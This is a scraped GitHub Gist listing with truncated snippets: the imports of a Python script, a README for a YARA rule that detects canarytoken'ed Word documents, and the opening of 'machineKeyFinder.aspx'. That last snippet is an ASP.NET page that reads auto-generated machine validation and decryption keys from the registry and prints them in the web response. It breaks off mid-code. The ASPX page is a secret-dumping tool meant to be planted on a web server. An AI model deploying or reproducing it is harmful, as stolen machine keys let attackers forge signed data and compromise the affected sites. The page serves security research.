Skip to content

Instantly share code, notes, and snippets.

#!/usr/bin/python3
import re
import zipfile
import argparse
from urllib.parse import urlparse
from colorama import Fore
from colorama import Style
from colorama import init
@singe
singe / README.md
Last active November 7, 2022 19:06
Canarytoken'ed Word .docx yara rule

Remember to unzip the .docx first, or use scan.sh.

Compile the yara rule for scan.sh to work yarac canarytoken.yar canarytoken

@irsdl
irsdl / machineKeyFinder.aspx
Last active August 26, 2024 03:56
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
<%@ Page Language="C#" %>
<%
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/
Response.Write("<br/><hr/>");
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{});
if(autoGenKeyV4!=null)
Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty));
Response.Write("<br/>");
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{});
if(autoGenKey!=null)